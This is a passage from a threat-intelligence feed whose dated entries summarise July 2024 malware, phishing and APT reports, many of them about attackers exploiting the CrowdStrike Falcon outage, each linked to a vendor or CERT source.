Summary:: Securonix threat researchers have discovered that threat actors are exploiting a recent outage in CrowdStrike's Falcon sensor to spread malware and carry out eCrime operations. They are sending phishing emails, setting up scam websites and creating fake domains to distribute malware. In one case where victims are receiving phishing emails with a file called crowdstrike-hotfix.zip. This file contains Spanish-language instructions for a fake recovery tool. When opened, it installs HijackLoader which then loads Remcos RAT and give attackers full access to the victim's system.

Source: https://www.securonix.com/blog/threat-actors-are-exploiting-the-recent-crowdstrike-outage-in-an-effort-to-deploy-malware-and-to-stage-ecrime-operations/

Intel Source:: Crowdstrike

Intel Name:: Daolpu_Stealer_via_Fake_Recovery_Manual

Date of Scan:: 2024-07-23

Impact:: LOW

Summary:: Researchers from the CrowdStrike Intelligence team have discovered a malicious Word document that pretending as a Microsoft recovery manual. This document contains macros that download a newly identified stealer called Daolpu. The threat actor's use of a fake recovery manual is a tactic to deceive victims and distribute the stealer. Initial analysis suggests that this activity is likely driven by criminal motives, highlighting the ongoing threat of sophisticated phishing attacks and the need for vigilance against malicious documents.

Source: https://www.crowdstrike.com/blog/fake-recovery-manual-used-to-deliver-unidentified-stealer/

Intel Source:: X (Twitter)

Intel Name:: CrowdStrike_BSOD_Exploited_for_Malware

Date of Scan:: 2024-07-23

Impact:: LOW

Summary:: Researchers from Zscaler ThreatLabz have observed that threat actors are exploiting a CrowdStrike BSOD bug to spread malware. They discovered a phishing campaign involving a Microsoft Word document that appears to provide recovery instructions. This document contains a malicious macro that, when activated, downloads an information-stealing malware with low detection rates.

Source: https://x.com/Threatlabz/status/1815442461545951710

Intel Source:: K7 Security Labs

Intel Name:: An_Overview_of_Braodo_Stealer

Date of Scan:: 2024-07-23

Impact:: LOW

Summary:: In recent months, K7 Security Labs have seen an increase in tweets discussing the emergence of Vietnamese-based malware known as Braodo Stealer. They explored the intricacies of Braodo, an information stealer capable of accessing the victims' systems and harvesting sensitive information such as credentials, banking information, and so on, as well as causing identity theft and financial damages.

Source: https://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/

Intel Source:: Crowdstrike

Intel Name:: Hackers_Exploiting_CrowdStrike_Update

Date of Scan:: 2024-07-22

Impact:: HIGH

Summary:: CrowdStrike Falcon sensor update was found to have a problem in a certain event which affects Windows OS on July 19, 2024, this issue was fixed immediately. Afterwards, CrowdStrike intelligence identified threat actors exploiting this by sharing a file that contained malicious ZIP file named crowdstrike-hotfix.zip across the globe. This ZIP archive has HijackLoader payload which is designed to launch RemCos upon execution. The campaign appears to be aimed at Latin American (LATAM) CrowdStrike customers, as evidenced by the Spanish filenames and instructions found in the ZIP files.

Source: https://www.crowdstrike.com/blog/likely-ecrime-actor-capitalizing-on-falcon-sensor-issues/

Intel Source:: Intel471

Intel Name:: Case_Studies_of_Volt_Typhoon

Date of Scan:: 2024-07-22

Impact:: LOW

Summary:: On May 23, 2023, a United States, Australian, New Zealand, Canadian, and British joint advisory raised concerns against Volt Typhoon, a Chinese threat actor group sponsored by the state that targets worldwide critical infrastructures. It has sophisticated ways of infiltrating networks such as using vulnerabilities in widely used network programs to gain access undetected. They seem more interested in disruption than traditional spying with focus on areas such as communication, energy, and transport. Newer advisories have been updating their tactics while providing threat hunting strategies that can be employed to identify them into IT environments.

Source: https://intel471.com/blog/threat-hunting-case-study-looking-for-volt-typhoon

Intel Source:: LinkedIn

Intel Name:: Crowdstrike_Phishing_Update_July_22

Date of Scan:: 2024-07-22

Impact:: HIGH

Summary:: On July 19, 2024, CrowdStrike identified and resolved an issue in a content update for their Falcon sensor affecting Windows systems. In response, threat actors have been observed exploiting this event through various social engineering tactics, including phishing emails, impersonation of CrowdStrike staff, and offering fraudulent remediation services. CrowdStrike Intelligence has identified numerous domains impersonating their brand, which may be used for malicious purposes or to spread negative sentiment.

Source: https://www.linkedin.com/feed/update/urn:li:activity:7221114299245551617/

Intel Source:: Palo Alto

Intel Name:: A_Deep_Dive_Into_RA_World_Ransomware_Group

Date of Scan:: 2024-07-22

Impact:: MEDIUM

Summary:: Researchers from Palo Alto have observed that is RA world has become more active on dark web leak site since March 2024. This group formerly known as RA group. They use a dual extortion tactic where they first steal sensitive data from their victims before encrypting it. If the victims refuse to pay ransom, the group threatens to publish the stolen data online. RA world primarily exploits internet facing servers to execute their attacks and upload final payload Babuk ransomware. Initially they targeted healthcare organizations but now shifted to the manufacturing sector since mid-2024. The U.S. is most affected, followed by countries in Europe, Southeast Asia and South America.

Source: https://unit42.paloaltonetworks.com/ra-world-ransomware-group-updates-tool-set/

Intel Source:: CERT-UA

Intel Name:: UAC_0063_Attacks_Research_Institutions_of_Ukraine

Date of Scan:: 2024-07-22

Impact:: LOW

Summary:: The cyber attack on a Ukrainian scientific research institution by the UAC-0063 group involved compromising an employee's email account to distribute malicious documents using HATVIBE and CHERRYSPY malicious programs. These documents, initially sent as modified email attachments, containing embedded macros and while opening the documents and enabling macros triggered a sequence where a secondary DOC file created an encoded HTA file (HATVIBE "RecordsService") and established a scheduled task for persistence ("C:\Windows\System32\Tasks\vManage\StandaloneService").

Source: https://cert.gov.ua/article/6280129

Intel Source:: Cyfirma

Intel Name:: Hackers_Launching_Campaign_For_Reap_BlueScreen

Date of Scan:: 2024-07-22

Impact:: HIGH

Summary:: Researchers at CYFIRMA have identified a campaign referred to as Reap BlueScreen where hackers are looking to make profit. As part of this effort, hackers may attempt to cause harm and infiltrate systems by using mass-scale phishing domains to target unsuspecting end users. Their analysis discovered 45+ phishing domains in the wild that may be leveraged by hackers to attack users and systems around the world.

Source: https://www.cyfirma.com/research/crowdstrike-falcon-sensor-update-worldwide-blue-screen-of-death-bsod-incident/

Intel Source:: ASEC

Intel Name:: Exploiting_LummaC2_Malware

Date of Scan:: 2024-07-22

Impact:: LOW

Summary:: Researchers from ASEC have observed that LummaC2 is using the gaming platform Steam to control its operations. This malware spreads through fake software downloads and online ads, and recently it has been posing as legitimate sites like Notion, Slack, and Capcut. The latest version of LummaC2 can change its control domains anytime, making it harder to detect and stop.

Source: https://asec.ahnlab.com/ko/68023/

Intel Source:: SentinelLabs

Intel Name:: CrowdStrike_Global_Outage

Date of Scan:: 2024-07-22

Impact:: HIGH

Summary:: On July 19, 2024, CrowdStrike released a sensor configuration update to Windows systems. This update caused system crashes and Blue Screen of Death (BSOD) errors. This issue disrupted critical services in banks, airlines, hospitals and IT industries worldwide. In response, threat actor has been using these domains and sending threatening emails to try to extort Bitcoin from their victims.

Source: https://www.sentinelone.com/blog/crowdstrike-global-outage-threat-actor-activity-and-risk-mitigation-strategies/

Intel Source:: ESET

Intel Name:: HotPage_Adware_Exploitation

Date of Scan:: 2024-07-19

Impact:: LOW

Summary:: Researchers from ESET have discovered a Chinese adware named HotPage, which is distributed as an Internet cafe security solution. HotPage uses a signed, vulnerable driver to inject ads into browsers and intercept network traffic. The driver, signed by Microsoft, unintentionally allows other threats to run code at the SYSTEM privilege level. This shows how adware developers exploit trust-based security models, posing significant risks by leaving systems vulnerable to more dangerous attacks.

Source: https://www.welivesecurity.com/en/eset-research/hotpage-story-signed-vulnerable-ad-injecting-driver/

Intel Source:: Trend Micro

Intel Name:: Play_Ransomware_Targets_ESXi

Date of Scan:: 2024-07-19

Impact:: LOW

Summary:: Researchers from Trend Micro have discovered a new Linux variant of the Play ransomware, specifically targeting ESXi environments. This ransomware first verifies if it is running on an ESXi environment before executing. It has successfully evaded security measures, as indicated by VirusTotal. Additionally, the Play ransomware group appears to be leveraging services and infrastructure associated with the Prolific Puma group.

Source: https://www.trendmicro.com/en_us/research/24/g/new-play-ransomware-linux-variant-targets-esxi-shows-ties-with-p.html

Intel Source:: NKI GOV

Intel Name:: Lokibot_Malware_Disguised_as_NEAK_Attachments

Date of Scan:: 2024-07-19

Impact:: LOW

Summary:: The National Cyber Security Institute (NBSZ NKI) of the National Security Service from Hungary is issuing an alert regarding harmful attachments abusing the name of the National Health Insurance Fund (NEAK) manager. These attachments contain malware called Lokibot. The primary activity of this malware is data theft, which includes user credentials, passwords, banking information, and other sensitive data from various applications and web browsers.

Source: https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-a-nemzeti-egeszsegbiztositasi-alapkezelo-neak-nevevel-visszaelo-levelekkel-kapcsolatban/

Intel Source:: Twitter

Intel Name:: CrowdStrike_Outage_Phishing

Date of Scan:: 2024-07-19

Impact:: HIGH

Summary:: Threat actors leveraging global CrowdStrike outage on July 19, 2024 to spin up new malicious domains and phishing pages posing as a solution to the issue.

Source: https://x.com/JCyberSec_/status/1814291349610381632

Intel Source:: Huntress

Intel Name:: Fake_Updates_Install_BOINC_Software

Date of Scan:: 2024-07-19

Impact:: LOW

Summary:: Researchers at Huntress have discovered new behavior in the SocGholish malware, also known as Fake Updates. This malware campaign spreads infections through fake browser updates on compromised websites. The recent infections include fileless AsyncRAT and a malicious version of BOINC software, a platform for volunteer computing. These infections use heavily obfuscated PowerShell loaders to evade detection. The malicious version of BOINC connects to fake servers, allowing attackers to collect data, transfer files, and execute tasks, which can be sold to other malicious actors or used to deploy ransomware.

Source: https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software

Intel Source:: Threatdown

Intel Name:: Exploring_WorkersDevBackdoor_and_MadMxShell

Date of Scan:: 2024-07-18

Impact:: LOW

Summary:: Researchers from ThreatDown have observed a series of malicious Google search ads targeting IT staff. These types of attacks have been seen before. By closely tracking these ads, they discovered shared infrastructure distributing two payloads: the MadMxShell backdoor and the WorkersDevBackdoor. Both malware variants not only share an advert but also have interconnected delivery systems. The C&C server for MadMxShell is directly linked to the WorkersDevBackdoor infrastructure. These malware payloads are capable of stealing sensitive data and providing a gateway for initial access brokers involved in ransomware deployment.

Source: https://www.threatdown.com/blog/workersdevbackdoor-and-madmxshell-converge-in-malvertising-campaigns/

Intel Source:: Sygnia

Intel Name:: Ghost_Emperor_Demodex_Returns

Date of Scan:: 2024-07-18

Impact:: LOW

Summary:: The Incident Response team from Sygnia have investigated a client’s network that was compromised and was leveraged to penetrate one of its business partner’s networks in late 2023. There were numerous infected servers and workstations, all linked to one variant of the Demodex rootkit linked to the threat group Ghost Emperor. This sophisticated Chinese-linked group focuses mainly on South-East Asian telecommunications and government sectors by using multi-stage malware approach for stealth, persistence as well as several obfuscation techniques that make it difficult for analysis. Normally, first entry points are like Proxy Logon vulnerabilities subsequently with a batch file causing the infection chain.

Source: https://www.sygnia.co/blog/ghost-emperor-demodex-rootkit/

Intel Source:: CERT-UA

Intel Name:: UAC_0180_Cyberattacks_on_Defense

Date of Scan:: 2024-07-18

Impact:: LOW

Summary:: Researchers from CERT-UA observed that the UAC-0180 group is targeting Ukrainian defense enterprises with cyberattacks which involve emails with a ZIP file containing a PDF link. If the victim clicks on the link, the file "adobe_acrobat_fonts_pack.exe" is downloaded, which is classified as the malicious program GLUEEGG, developed using the Go programming language. The main purpose of GLUEEGG is to decrypt (XOR with a 128-byte key) and run the DROPCLUE loader, developed using the Lua programming language.

Source: https://cert.gov.ua/article/6280099

Intel Source:: CyberArmor

Intel Name:: White_Snake_With_Multi_Stage_Malware_Dropper

Date of Scan:: 2024-07-18

Impact:: LOW

Summary:: CyberArmor researchers have uncovered one of the recent threat involving Tax Invoice themed campaign. The WhiteSnake malware stealer is deployed with this campaign through a multi-stage malware dropper. In the form of an email with subject as tax invoice, potential victims receive a zip file that contains a windows batch script which is actually the first dropper.

Source: https://cyberarmor.tech/white-snake-latest-campaign-with-multi-stage-malware-dropper/

Intel Source:: Medium (Andrew Petrus)

Intel Name:: The_StrelaStealer_Targeting_Email_Credentials

Date of Scan:: 2024-07-18

Impact:: LOW

Summary:: StrelaStealer is a simple yet successful email credential stealing application for Outlook and Thunderbird clients that is currently active in Europe, mainly Germany. An obfuscated batch file is dropped to the disk when the malware is executed via a JavaScript attachment included in phishing emails. In order to make its activities more difficult to see, the batch script makes use of numeric and alphabetical variables.

Source: https://medium.com/@andrew.petrus/unraveling-strelastealer-5d56e150456e

Intel Source:: CERT-AGID

Intel Name:: MAECI_Themed_Phishing_Campaign

Date of Scan:: 2024-07-18

Impact:: MEDIUM

Summary:: A phishing website masquerading as the Ministry of Foreign Affairs official webpage for getting an Italy visa has been discovered by CERT-AGID researchers. The fake website aims to obtain users' login information and passport numbers.

Source: https://x.com/agidcert/status/1813861145662697512?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: Google Cloud

Intel Name:: APT41_Has_Arisen_From_the_DUST

Date of Scan:: 2024-07-18

Impact:: MEDIUM

Summary:: Google-owned Mandiant researchers have discovered the long running campaign operating by China based threat actor APT41. This group is targeting various sectors including global shipping, logistics, media, entertainment, technology, and automotive and most of the organisations are in Italy, Spain, Taiwan, Thailand, Turkey, and the United Kingdom. This group employs ANTSWORD and BLUEBEAM web shells to execute the DUSTPAN malware, which then deployed the BEACON backdoor for C2 communication. Since 2023, APT41 has successfully infiltrated and maintained unauthorized access to multiple networks, enabling them to steal sensitive data.

Source: https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust/

Intel Source:: Trellix

Intel Name:: New_Strain_of_Cactus_Ransomware

Date of Scan:: 2024-07-18

Impact:: LOW

Summary:: Trellix researchers have analyzed the Cactus Ransomware which appeared in March, 2023. It is a well-known ransomware that is characterized by double extortion and targets multiple commercial entities as well as high-profile victims. In addition to the demand for ransom in exchange for file decryption, it also threatens to leak the victim's private data if the ransom payment is not made. For its stronger security, Cactus employs RSA and AES encryption algorithms including OpenSSL library which uses specifically AES_CBC_256 and RSA_4096 models.

Source: https://www.trellix.com/blogs/research/cactus-ransomware-new-strain-in-the-market/

Intel Source:: X (Twitter)

Intel Name:: New_Domains_of_LockBit_Ransomware

Date of Scan:: 2024-07-18

Impact:: HIGH

Summary:: Security researcher Rakesh Krishnan have identified the new domains and chat URLs of LockBit on X (Twitter). Recently, multiple campaigns have been with LockBit ransomware.

Source: https://x.com/RakeshKrish12/status/1813098858802737636

Intel Source:: Recorded Future

Intel Name:: Open_Source_Tools_Used_by_TAG_100

Date of Scan:: 2024-07-17

Impact:: MEDIUM

Summary:: The Recorded Future Insikt Group have detected a cyber-espionage operation attributed to TAG-100, targeting global government and private sector organizations. The group exploited internet-facing devices and employed open-source tools such as the Go backdoor Pantegana. The campaign compromised two Asia-Pacific intergovernmental organizations and targeted multiple diplomatic and trade entities.

Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-0716.pdf

Intel Source:: Splunk

Intel Name:: Breaking_Down_Linux_Gomir

Date of Scan:: 2024-07-17

Impact:: LOW

Summary:: Splunk researchers have discussed recent cases of supply chain attacks by the Kimsuky APT group. They exploited the vulnerabilities in software packages such as TrustPKI and NX_PRNMAN, which they embedded with GoBear backdoor. That allowed attackers to breach into specific systems and gaining unauthorized access and control. The emergence of Linux.Gomir, a variant of the GoBear backdoor, states that these kinds of malware remain a constant menace.

Source: https://www.splunk.com/en_us/blog/security/breaking-down-linux-gomir-understanding-this-backdoors-ttps.html

Intel Source:: Cyberint

Intel Name:: Handala_Hacker_Group

Date of Scan:: 2024-07-17

Impact:: LOW

Summary:: Cyberint researchers have observed the activities of a hacker group called Handala. The Handala name is based on a character created by Palestinian political cartoonist Naji al-Ali in 1969. The group primarily operates through a Telegram channel and a Twitter account with multiple subscribers. They also have a backup Telegram data leak channel and their own websites. Handala focuses on cyber-attacks against Israeli critical sectors, including phishing, ransomware, and website destruction. Their aim is to challenge and antagonize the Israel National Cyber Directorate, which is responsible for cyber defense.

Source: https://cyberint.com/blog/threat-intelligence/handala-hack-what-we-know-about-the-rising-threat-actor/

Intel Source:: ISC.SANS

Intel Name:: AndroxGh0st_Malware

Date of Scan:: 2024-07-17

Impact:: LOW

Summary:: Researchers at ISC.SANS have discovered malware called AndroxGh0st, written in Python. This malware targets .env files in web applications, specifically those using the Laravel framework, which is an open-source PHP web development framework. AndroxGh0st is part of a botnet operation that mainly aims to steal credentials and exploit other functions like vulnerability scanning, SMTP, APIs, and web shell deployment.

Source: https://isc.sans.edu/diary/Who+You+Gonna+Call+AndroxGh0st+Busters+Guest+Diary/31086/

Intel Source:: Binary Defense

Intel Name:: Killer_Ultra_Malware_Attack_Targeting_EDR_Products

Date of Scan:: 2024-07-17

Impact:: LOW

Summary:: ARC Labs researchers have analyzed a new malware named Killer Ultra, which was initially linked to Qilin ransomware activities. Specifically, this tool focuses on the endpoint detection and response (EDR) and antivirus (AV) software in order to effectively disable them during an attack. The Zemana driver widely known is employed by Killer Ultra in terminating these defensive processes.

Source: https://www.binarydefense.com/resources/blog/technical-analysis-killer-ultra-malware-targeting-edr-products-in-ransomware-attacks/

Intel Source:: SentinelLabs

Intel Name:: FIN7_Advanced_Tactics_and_Tools

Date of Scan:: 2024-07-17

Impact:: LOW

Summary:: Researchers from SentinelLabs have discovered that FIN7 is using multiple fake identities to hide their true identity and continue their illegal activities in the underground market. FIN7’s campaigns now include automated SQL injection attacks for exploiting public-facing applications. They have also developed a highly specialized tool called AvNeutralizer (also known as AuKill), which is designed to interfere with security solutions. Recently, a new version of AvNeutralizer has been observed using a previously unseen technique to tamper with security solutions, leveraging a Windows built-in driver called ProcLaunchMon.sys

Source: https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/

Intel Source:: PaloAlto

Intel Name:: Phishing_Campaigns_using_HTTP_Refresh_Header

Date of Scan:: 2024-07-17

Impact:: MEDIUM

Summary:: PaloAlto researchers have uncovered the large phishing campaign that uses HTTP refresh headers to redirect victims to phishing sites. This tactic helps the initial links to avoid detection. However, these links are quickly blocked or offline, making the campaigns short-lived.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-07-15-IOCs-from-recent-phishing-campaign.txt

Intel Source:: Cyble

Intel Name:: Crypto_Users_targets_via_RDPWrapper_and_Tailscale

Date of Scan:: 2024-07-17

Impact:: LOW

Summary:: CRIL researchers have uncovered a campaign that starts with a Zip file containing a malicious shortcut (.lnk) file. When the file runs, it downloads a PowerShell script that allows the attackers to gain RDP access to the victim’s system. The attack includes various tools such as PowerShell scripts, batch files, Go-based binaries, and a vulnerable driver called Terminator. The threat actor uses RDPWrapper and Tailscale to establish private network connections and facilitate remote access. The campaign targets Indian users, particularly those involved in the cryptocurrency industry by using a fake PDF related to CoinDCX.

Source: https://cyble.com/blog/new-malware-campaign-abusing-rdpwrapper-and-tailscale-to-target-cryptocurrency-users/

Intel Source:: Squarespace

Intel Name:: Squarespace_Domains_Vulnerable_to_DNS_Hijacking

Date of Scan:: 2024-07-16

Impact:: LOW

Summary:: Squarespace issued a security advisory on or around July 9, 2024, when an unknown threat actor began compromising various domain names registered with Squarespace. All affected domains were migrated to Squarespace as part of the migration. A coordinated wave of DNS hijacking attacks targeting decentralized finance (DeFi) cryptocurrency domains registered with the Squarespace registrar, redirecting visitors to phishing sites containing wallet drainers.

Source: https://github.com/security-alliance/advisories/blob/main/2024-07-squarespace.pdf

Intel Source:: Objective-See

Intel Name:: New_Version_of_Beavertail_MacOS_Malware_Identified

Date of Scan:: 2024-07-16

Impact:: LOW

Summary:: Researchers at Objective-See have discovered a new malware developed by North Korean government-affiliated attackers that seems to be a legal browser-based video conference program and can be used to extract data from affected PCs.

Source: https://objective-see.org/blog/blog_0x7A.html

Intel Source:: ThreatMon

Intel Name:: The_New_Noxious_Stealer

Date of Scan:: 2024-07-16

Impact:: LOW

Summary:: Researchers from ThreatMon have identified an open-source stealing tool known as Noxious Stealer, which is based on Python and available on GitHub. It extracts sensitive information from online accounts and victim systems. The target of the tool is Discord Nitro users so that it can steal billing details, account tokens, email addresses and phone numbers. Furthermore, it collects user data, cookies browser history and Wi-Fi network information. It uses evasion techniques to escape antivirus such as VirusTotal too. Again, it can extract wallet addresses and private keys in order to compromise cryptocurrency wallets.

Source: https://x.com/MonThreat/status/1813159879915229479

Intel Source:: Phylum

Intel Name:: Malicious_NPM_Packages_with_Hidden_Backdoors

Date of Scan:: 2024-07-16

Impact:: LOW

Summary:: Phylum researchers have discovered two malicious packages on the npm package registry that hide backdoor code to execute malicious commands sent from a remote server. Although these packages appear legitimate at first, our system flagged them due to their advanced command and control functionality, which is concealed in image files and executed during package installation.

Source: https://blog.phylum.io/fake-aws-packages-ship-command-and-control-malware-in-jpeg-files/

Intel Source:: McAfee

Intel Name:: Social_Engineering_Tactic_to_Deploy_Malware

Date of Scan:: 2024-07-16

Impact:: LOW

Summary:: McAfee researchers have discovered a new technique for malware delivery called the Clickfix infection chain. It starts when attackers lure users into visiting legitimate looking but compromised websites. These websites redirect users to click on fake popups that instruct them to paste a script into a PowerShell terminal and manipulates users to run malicious scripts. Once the malware is active, it steals personal data and send to its C2 server. Lumma Stealer and DarkGate malware are using this technique.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/

Intel Source:: Dark Atlas

Intel Name:: The_Investigation_of_TrollAgent_Stealer

Date of Scan:: 2024-07-16

Impact:: LOW

Summary:: Researchers at Dark Atlas have observed that in January 2024, Kimsuky launched a focused cyber campaign against high-profile targets in South Korea, using digital signatures of well-established firms such as SGA Solutions and D2innovation to deliver and deploy another stage of the malware. It started with the deployment of an installer that downloaded a GoLang-written DLL known as TrollAgent protected by VMProtect3 and it is made to steal valuable information.

Source: https://darkatlas.io/blog/kimsuky-apt-the-trollagent-stealer-analysis

Intel Source:: ISC.SANS

Intel Name:: Attacks_With_CVE_2020_15227_Nette_PHP_Framework

Date of Scan:: 2024-07-16

Impact:: LOW

Summary:: Another version of an exploit for CVE-2020-15227, ISC.SANS researchers have observed several exploit attempts against an older vulnerability in the Nette Framework. It is a PHP framework designed to make web application development easier. In 2020 saw the discovery and patching of an OS command injection vulnerability in Nette. As is usually the case with OS command injection, it was easy to exploit. Not long later, an exploit was made public.

Source: https://isc.sans.edu/diary/rss/31076

Intel Source:: SentinelLabs

Intel Name:: NullBulge_Threat_Actor

Date of Scan:: 2024-07-16

Impact:: LOW

Summary:: SentinelLabs researchers have discovered a new threat actor group called NullBulge, which targets AI and gaming organizations. NullBulge inserts malicious code into legitimate software distribution channels by using popular platforms like GitHub, Reddit, and Hugging Face to spread widely. They use tools like Async RAT and Xworm to deploy LockBit ransomware. This group shows a change in ransomware attacks towards hacktivism for financial gain.

Source: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/

Intel Source:: ASEC

Intel Name:: Beware_of_Malware_Disguised_as_Cracks

Date of Scan:: 2024-07-16

Impact:: LOW

Summary:: Researchers at ASEC have observed the malware hidden as crack programs such as MS office cracks. This malware spread via web downloads and torrents, allow attackers to keep control on infected systems through regular updates. Attackers install the malware differently based on whether the V3 security software is installed and use the task scheduler for persistence, ensuring it continues to operate even if detected.

Source: https://asec.ahnlab.com/ko/67917/

Intel Source:: Cyble

Intel Name:: Russian_Hacktivists_Target_French_Websites_Ahead_of_Paris_Olympics

Date of Scan:: 2024-07-16

Impact:: LOW

Summary:: In June 23, 2024, Cyble researchers have detected a major cyber threat involving Russian hacktivist groups aiming at French targets in preparation for the forthcoming Paris Olympics. This DDoS attack was launched by The People’s Cyber Army that is linked with APT441 (Sandworm, FROZENBARENTS, and Seashell Blizzard) as well as HackNeT their allies which they termed it as a training exercise. It is worth noting that this incident is the first documented case of state supported Russian hacktivists attacking French digital infrastructure before an international event.

Source: https://cyble.com/blog/hacktivist-groups-peoples-cyber-army-and-hacknet-launch-trial-ddos-attacks-on-french-websites-prior-to-the-onslaught-during-paris-olympics/

Intel Source:: JPCERT

Intel Name:: Attack_by_MirrorFace_on_Japanese_Organizations

Date of Scan:: 2024-07-16

Impact:: MEDIUM

Summary:: Researchers from JPCERT have been tracking the MirrorFace LODEINFO and NOOPDOOR malware attack operations since 2022. Originally, the actor's targets were think tanks, universities, political organizations, and the media. However, starting in 2023, those targets have changed to include manufacturers and research facilities. Regarding the TTPs, they now take advantage of weaknesses in external assets in addition to their previous tactic of spear phishing emails to gain access to the target's network.

Source: https://blogs.jpcert.or.jp/en/2024/07/mirrorface-attack-against-japanese-organisations.html

Intel Source:: Validin

Intel Name:: Lazarus_Group_APT_Tracker_With_Validin_DNS_History

Date of Scan:: 2024-07-16

Impact:: MEDIUM

Summary:: Researchers from Validin have shown how to leverage historical DNS with thorough annotations to go beyond established markers and find current and recent domain names and IP addresses that are very likely to be connected to the Lazarus Group.

Source: https://www.validin.com/blog/hunting-lazarus-dns-history-host-responses/

Intel Source:: Knowsec 404 Lab

Intel Name:: OceanLotus_APT_Attack_Using_Social_Security_Topics

Date of Scan:: 2024-07-15

Impact:: LOW

Summary:: The Knowsec 404 Labs have found an attack sample targeting the OceanLotus organization. The sample uses words like social security and provident fund adjustment to entice victims to click. Simultaneously, the sample is highly consistent with the investigation findings of the OceanLotus APT group imitating the APT29 attack activities that were uncovered in 2023.

Source: https://mp.weixin.qq.com/s?__biz=MzAxNDY2MTQ2OQ==&mid=2650979391&idx=1&sn=d40b3efc4c0686f73aabbb47f7f61c15&chksm=8079fe0db70e771b503d98cb8bc757a71f78805e6b90483f217c9fa673996245314606c28d3d&scene=178&cur_album_id=1833896270264844290#rd

Intel Source:: ASEC

Intel Name:: Private_HTS_program_is_using_for_attacks

Date of Scan:: 2024-07-15

Impact:: LOW

Summary:: ASEC researchers have identified new malware that distributes HTS called HPlus which similar to previous malware Quasar RAT. The main difference is HPlus uses an MSI installer instead NSIS installer. Additionally, the attacker has also added remote support functionality via AnyDesk. When users click the Remote Support button, AnyDesk is executed their request. After installation, users run a desktop shortcut that launches the updater program which reads the configuration file, connects to the server and uses FTP server to perform updates. The attacker manipulates the configuration file to set as FTP server which actual malware is hosted. This causes the malware to be downloaded and installed as a compressed file.

Source: https://asec.ahnlab.com/ko/67881/

Intel Source:: Trend Micro

Intel Name:: VoidBanshee_Targets_Windows_Users

Date of Scan:: 2024-07-15

Impact:: MEDIUM

Summary:: Trend Micro researchers have discovered the exploitation of the MSHTML remote code execution vulnerability CVE-2024-38112 by using Atlantida Stealer, which first emerged in January 2024. Void Banshee uses this vulnerability as part of their attack chain to infect victim machines with the Atlantida info-stealer, which collects system information and sensitive data like passwords and cookies from various applications. They lure victims by using zip archives containing malicious files disguised as book PDFs, shared through cloud-sharing websites, Discord servers, and online libraries. The attackers are targeting North America, Europe, and Southeast Asia countries.

Source: https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html

Intel Source:: Checkpoint

Intel Name:: New_Bugsleep_Backdoor_by_Muddywater

Date of Scan:: 2024-07-15

Impact:: MEDIUM

Summary:: Checkpoint researchers have discovered phishing campaigns conducted by Muddywater, an Iranian threat group active since at least 2017. Attackers are using a custom backdoor called Bugsleep and exploit Egnyte, a legitimate file-sharing platform used for easy file transfer via web browsers. Muddywater entices their targets by sending invitations to webinars and online courses and uses the English language more frequently instead of using local language in their recent campaigns. They are targeting sectors such as municipalities, airlines, travel agencies, and media. Many emails are sent to companies in Israel, with others are aimed at entities in Turkey, Saudi Arabia, India, and Portugal.

Source: https://research.checkpoint.com/2024/new-bugsleep-backdoor-deployed-in-recent-muddywater-campaigns/

Intel Source:: Malwarebytes

Intel Name:: Atomic_Stealer_Delivered_by_Fake_Microsoft_Teams

Date of Scan:: 2024-07-15

Impact:: LOW

Summary:: Malwarebytes researchers have observed the macOS ecosystem has seen increased cyberattacks as hackers take advantage of popular messaging platforms such as Microsoft Teams to spread malware through deceptive advertisements and fake installers. Recent malvertising campaigns have shown this trend of criminals targeting MacOS with more sophisticated techniques, using advanced evasion techniques.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/07/fake-microsoft-teams-for-mac-delivers-atomic-stealer

Intel Source:: Cofense

Intel Name:: New_Phishing_Tactic_Targets_Employees

Date of Scan:: 2024-07-15

Impact:: LOW

Summary:: Researchers from Cofense have observed the new tactic of phishing emails of company’s HR department. These emails appear in your inbox with a subject line like “Modified Employee Handbook for All Employees – Kindly Acknowledge,”. It looks legitimate and starts with a formal greeting and uses corporate communications. The target of these emails to click on link and lure you to enter the login credentials. The attacker uses psychological tactics such as fear of not following company policies and the important updates in the handbook to manipulate you into clicking the malicious link.

Source: https://cofense.com/blog/beware-of-the-latest-phishing-tactic-targeting-employees/

Intel Source:: CERT-AGID

Intel Name:: VCRuntime_Campaign_via_Malspam_Revenue_Agency

Date of Scan:: 2024-07-15

Impact:: LOW

Summary:: CERT-AGID researchers have finally identified an Italian campaign with a theme "Agenzia delle Entrate". Victims receive a PEC with a link to a ZIP file called "Skype". This ZIP package contains an MSI file, which, when executed, launches a JAR file. This JAR is packaged with a key (KEY) and a file containing a large list of UUIDs. These UUIDs include the encrypted information required to obtain the shellcode that will be run on the computer.

Source: https://x.com/agidcert/status/1809182289072447665?s=12&t=8PuF3QXqo9azqMLbBfcyeA

Intel Source:: TG Soft

Intel Name:: Chinese_Hacking_Group_Targeting_Italy

Date of Scan:: 2024-07-15

Impact:: MEDIUM

Summary:: Researchers at TG Soft discovered two targeted attacks on Italian companies and government entities, attributed to a Chinese cyber actor connected to APT17, also known as DeputyDog. They use variations of Rat 9002 malware, one campaign using an Office document while another employed a decoy link. In both cases, the idea is to deceive victims into downloading what looked like Skype for Business Package from a domain that seemed to be related to an Italian government entity.

Source: https://www.tgsoft.it/news/news_archivio.asp?id=1557&lang=eng

Intel Source:: CVERC

Intel Name:: Volt_Typhoon_Targeting_US_Congress_and_Taxpayers

Date of Scan:: 2024-07-15

Impact:: MEDIUM

